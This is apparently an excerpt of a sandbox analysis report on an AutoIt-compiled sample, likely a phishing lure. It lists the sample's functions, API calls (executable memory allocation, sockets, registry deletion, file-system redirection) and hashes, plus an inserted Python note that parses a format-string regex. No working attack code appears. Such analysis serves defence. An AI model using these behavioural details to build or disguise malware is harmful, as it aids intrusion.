                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                            • Part of subcall function 00DF7BB1: _memmove.LIBCMT ref: 00DF7C0B
                                          • __swprintf.LIBCMT ref: 00E0302D
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E02EC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: 73b4e2412b7f0d60f60da796715e3411803eb3b87353e8000de49e9a92834153
                                          • Instruction ID: ce71dd710666b1859a6f288cdbb9095f08f0b1efefcf0ed1683b88309fb33857
                                          • Opcode Fuzzy Hash: 73b4e2412b7f0d60f60da796715e3411803eb3b87353e8000de49e9a92834153
                                          • Instruction Fuzzy Hash: 7B918E71608305AFC718EF24D885CBFBBE8EF85744F01991DF555A72A1DA20EE84CB62
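The string referenced at xref 00E02EC6 in the record above is a printf-style format grammar: an escape sequence (\\, \n, \r, \t), a literal %%, or a %-conversion with optional flag, width, precision and length modifier, feeding the __swprintf call that follows. That it belongs to a StringFormat-style routine of the AutoIt runtime is an assumption on my part; the report only shows the string. The Python below is an added example, not code from the sample or the runtime: it applies the regex verbatim to tokenize a format string, counts the argument slots the conversions consume, and flags % sequences the grammar rejects, which is the check one wants wherever a format string can be influenced by input.

```python
import re

# The grammar string exactly as the report shows it at xref 00E02EC6:
# an escape (\\, \n, \r, \t), a literal '%%', or a %-conversion with optional
# flag, width, precision and length modifier.
FORMAT_SPEC_RE = re.compile(
    r"\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]"
)


def tokenize_format(fmt: str) -> list:
    """Tokenize fmt into (kind, lexeme) pairs; kind is 'escape', 'literal_percent',
    'conversion' or 'text' (anything the grammar did not claim)."""
    tokens, pos = [], 0
    for m in FORMAT_SPEC_RE.finditer(fmt):
        if m.start() > pos:
            tokens.append(("text", fmt[pos:m.start()]))
        lexeme = m.group(0)
        if lexeme.startswith("\\"):
            kind = "escape"
        elif lexeme == "%%":
            kind = "literal_percent"
        else:
            kind = "conversion"
        tokens.append((kind, lexeme))
        pos = m.end()
    if pos < len(fmt):
        tokens.append(("text", fmt[pos:]))
    return tokens


def argument_slots(fmt: str) -> int:
    """Number of arguments the conversions consume: one each, plus one for every
    '*' used as width or precision. A caller must supply exactly this many."""
    return sum(1 + lexeme.count("*")
               for kind, lexeme in tokenize_format(fmt) if kind == "conversion")


def unparsed_percents(fmt: str) -> list:
    """Two-character snippets for every '%' left in text tokens, i.e. sequences
    the grammar rejects (for instance %n or %p, which it does not support)."""
    bad = []
    for kind, lexeme in tokenize_format(fmt):
        if kind != "text":
            continue
        for i, ch in enumerate(lexeme):
            if ch == "%":
                bad.append(lexeme[i:i + 2])
    return bad


if __name__ == "__main__":
    # Constructed inputs; note the raw string so that \n reaches the tokenizer
    # as backslash + n, the form the grammar's escape branch expects.
    for sample in (r"%s: %d items, %5.2f%% done\n", "%*.*f", "100% sure", "%n %p"):
        print(repr(sample), tokenize_format(sample), argument_slots(sample), unparsed_percents(sample))
```

Two things the grammar makes visible: there is no %n, so the classic write-what-where primitive is not expressible through it, and a space is a legal flag, so prose such as "100% sure" parses as the conversion "% s" and silently consumes an argument. Comparing argument_slots() against the number of arguments actually supplied is the audit step.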
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00E4B981
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%
                                          • API String ID: 3565006973-1286912533
                                          • Opcode ID: 2616f31a8774602fa337d45a3976a3b0816a6b278824f3d9de44ca6d16e0ef78
                                          • Instruction ID: 2627eb47506942e9002080e3b261643a1c4e4d1b7a3abaf870598f79aff837ed
                                          • Opcode Fuzzy Hash: 2616f31a8774602fa337d45a3976a3b0816a6b278824f3d9de44ca6d16e0ef78
                                          • Instruction Fuzzy Hash: 5E915C706002019FDB28DF28D885A6ABBF9FF49710F14956EF94AEB791DB70E841CB50
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 00E152DD
                                            • Part of subcall function 00E20340: __87except.LIBCMT ref: 00E2037B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorHandling__87except__start
                                          • String ID: pow
                                          • API String ID: 2905807303-2276729525
                                          • Opcode ID: c9cddb55b4f9fcfddbf25ae56294ce85703dededeb08a64767e7f9d79d383838
                                          • Instruction ID: 19c0fc6cd7cfd45d1452dc436f3d2633012670909969088e616e23e0089911a1
                                          • Opcode Fuzzy Hash: c9cddb55b4f9fcfddbf25ae56294ce85703dededeb08a64767e7f9d79d383838
                                          • Instruction Fuzzy Hash: F4515A33A08601CACB11B714E9413EE6BD09B80754F70AD59E4E5B22EBEE74CCC4DA45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: 7071067770dd638c7bd4f9864c26fda76c59d04378e8b07566bfd33baeec1c23
                                          • Instruction ID: a3b9101e88ea972539551d08856e1544b987d517e2a5f7a9a30fe0e4b391ac0c
                                          • Opcode Fuzzy Hash: 7071067770dd638c7bd4f9864c26fda76c59d04378e8b07566bfd33baeec1c23
                                          • Instruction Fuzzy Hash: 6F515576904249DFCF15DF28E888AFA7BA4EF16314F145055ECA1BB2A2C7709C86C770
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$_free
                                          • String ID: Oa
                                          • API String ID: 2620147621-3945284152
                                          • Opcode ID: e3f88d9764b69d5320ea809777fbbea6ae86e149823b2f24161960c162b07ad1
                                          • Instruction ID: 1d32c9fa1cb6731177c2a79e576ceb1db556ac3dafd466b4aac618a239955dc6
                                          • Opcode Fuzzy Hash: e3f88d9764b69d5320ea809777fbbea6ae86e149823b2f24161960c162b07ad1
                                          • Instruction Fuzzy Hash: 70517DB16083419FDB24CF68D841B6BBBE5FF89304F04592DE989A73A1DB31D981CB52
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$_memmove
                                          • String ID: ERCP
                                          • API String ID: 2532777613-1384759551
                                          • Opcode ID: 88066bba3419c6886fb4f82d7188a0497287167364b8fed07265f4d6ffc400b4
                                          • Instruction ID: d9ac14acb623fc049889e11623c5da5f054a691e3b4e697665f88e90bb11b6ad
                                          • Opcode Fuzzy Hash: 88066bba3419c6886fb4f82d7188a0497287167364b8fed07265f4d6ffc400b4
                                          • Instruction Fuzzy Hash: 1C51A3719007099BDB24CF65C8817EABBF4FF44318F20556EE55AEB281E771A6D4CB40
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E776D0
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E776E4
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E77708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: ff1ab693b1e6e82d34b086cb8bbacc802904362845278b1518dabe99cabfae86
                                          • Instruction ID: 3f407cb266662d6ae25aebb7a1801566ac59d9ea0ead5402127e3192bf612f92
                                          • Opcode Fuzzy Hash: ff1ab693b1e6e82d34b086cb8bbacc802904362845278b1518dabe99cabfae86
                                          • Instruction Fuzzy Hash: EE21BF32500219ABDF15CEA4CC42FEA3BB9EB48718F115254FE597B1D0DAB1A8948BA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E76FAA
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E76FBA
                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E76FDF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 780b5722518f6d76ab3a847b7aabf2e273bf3fdaef168b7f3c56633d0e81f4d8
                                          • Instruction ID: 5934ddca7068a23ca59b3fdcafd66d244c2232eea9ad36df112e4419a638dc59
                                          • Opcode Fuzzy Hash: 780b5722518f6d76ab3a847b7aabf2e273bf3fdaef168b7f3c56633d0e81f4d8
                                          • Instruction Fuzzy Hash: D7219232710118BFDF159F54DC85FBB3BAAEF89758F01D124F918AB190CA71AC558BA0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E779E1
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E779F6
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E77A03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: c49860cfbe571bd17c451fba80e85ad0d82d04520c62fbd6db3fbcfe5eb8e06c
                                          • Instruction ID: 14e665281242e3323e9047b41dee5d2400c3b523d4dcc8f5dcf98157d0350e51
                                          • Opcode Fuzzy Hash: c49860cfbe571bd17c451fba80e85ad0d82d04520c62fbd6db3fbcfe5eb8e06c
                                          • Instruction Fuzzy Hash: CD11E732244208BFEF149F61CC05FEB37A9EF89768F024529F745B6090D6719851CB60
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4C2E), ref: 00DF4CA3
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00DF4CB5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: cd7b1eacb60b6a546190c6f4d159f9efdb11e821d9651e2bd5d2c268a663c9f4
                                          • Instruction ID: 170ca66c4005782d5259a05696dd0c857687157eeb7571d1dc73e60f1b4cdf1a
                                          • Opcode Fuzzy Hash: cd7b1eacb60b6a546190c6f4d159f9efdb11e821d9651e2bd5d2c268a663c9f4
                                          • Instruction Fuzzy Hash: 28D01730511727CFD720DF32DA1861676E5AF05791F16D83AD88EE6150EA70D8C0CA60
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4CE1,?), ref: 00DF4DA2
                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00DF4DB4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-1355242751
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00DF4D2E,?,00DF4F4F,?,00EB62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00DF4D6F
                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00DF4D81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                          • API String ID: 2574300362-3689287502
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00E712C1), ref: 00E71080
                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E71092
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                          • API String ID: 2574300362-4033151799
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E69009,?,00E7F910), ref: 00E69403
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E69415
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 00E6E3D2
                                          • CharLowerBuffW.USER32(?,?), ref: 00E6E415
                                            • Part of subcall function 00E6DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00E6DAD9
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00E6E615
                                          • _memmove.LIBCMT ref: 00E6E628
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          APIs
                                          • GetWindowRect.USER32(0179EB10,?), ref: 00E79AD2
                                          • ScreenToClient.USER32(00000002,00000002), ref: 00E79B05
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00E79B72
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00E66CE4
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66CF4
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00E66D58
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00E66D64
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00E7F910), ref: 00E667BA
                                          • _strlen.LIBCMT ref: 00E667EC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E5BB09
                                          • GetLastError.KERNEL32(?,00000000), ref: 00E5BB2F
                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E5BB54
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E5BB80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
